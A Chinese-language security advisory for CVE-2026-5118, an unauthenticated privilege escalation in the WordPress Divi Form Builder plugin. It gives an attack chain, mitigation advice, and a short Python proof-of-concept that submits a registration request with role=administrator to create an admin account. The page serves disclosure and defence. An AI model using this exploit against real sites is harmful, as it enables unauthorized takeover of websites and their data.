IPBUF安全漏洞报告
English
CVE-2026-5118 CVSS 9.8 严重

CVE-2026-5118: WordPress Divi Form Builder权限提升漏洞

披露日期: 2026-05-21

漏洞信息

漏洞编号
CVE-2026-5118
漏洞类型
权限提升
CVSS评分
9.8 严重
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
WordPress Divi Form Builder插件

相关标签

权限提升WordPressCVE-2026-5118Divi Form Builder未授权访问

漏洞概述

WordPress Divi Form Builder插件在5.1.2及之前版本中存在严重的权限提升漏洞。该漏洞允许未经身份验证的攻击者在注册用户时,通过篡改POST请求中的'role'参数,绕过插件配置的默认角色限制,直接创建具有最高权限的管理员账户。由于无需用户交互即可利用,攻击者可轻易接管受影响网站的控制权,造成数据泄露或系统完全沦陷。

技术细节

该漏洞源于Divi Form Builder插件在处理用户注册逻辑时,未能对用户输入的'role'参数进行严格的服务器端验证。正常情况下,插件应强制使用表单配置中预设的`default_user_role`作为新用户角色。然而,受影响的版本直接信任客户端提交的'role'参数,并将其用于WordPress的用户创建流程中。攻击者只需向注册端点发送包含`role=administrator`的POST数据包,即可将新创建用户的权限提升为管理员。CVSS 3.1向量为AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H,表明该漏洞通过网络攻击,利用难度低,无需权限,对机密性、完整性和可用性均造成严重影响。

攻击链分析

STEP 1
侦察
攻击者识别出目标网站使用了WordPress,并安装了存在漏洞的Divi Form Builder插件(版本<= 5.1.2)。
STEP 2
漏洞利用
攻击者构造恶意的HTTP POST请求,向注册表单的处理接口发送数据,并将'role'参数设置为'administrator'。
STEP 3
权限提升
由于插件未验证该参数,服务器端直接创建了一个拥有管理员权限的新账户。
STEP 4
后门维持与控制
攻击者使用新创建的管理员账户登录WordPress后台,上传Webshell或安装恶意插件,从而完全控制网站。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (replace with actual vulnerable endpoint) target_url = "http://example.com/wp-admin/admin-ajax.php" # Payload data demonstrating the privilege escalation payload = { "action": "divi_form_builder_process_registration", "username": "attacker_admin", "email": "[email protected]", "password": "StrongPassword123!", "role": "administrator" # Vulnerable parameter: The plugin accepts this without validation } try: response = requests.post(target_url, data=payload) if response.status_code == 200: print("[+] Request sent successfully. Check if admin account was created.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")

影响范围

Divi Form Builder <= 5.1.2

防御指南

临时缓解措施
如果无法立即升级插件,建议暂时禁用Divi Form Builder插件的公开注册功能,或者通过Web应用防火墙(WAF)添加规则,阻止包含“role”参数的POST请求提交到注册接口。同时,管理员应审查现有用户列表,确认是否存在未授权的高权限账户。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表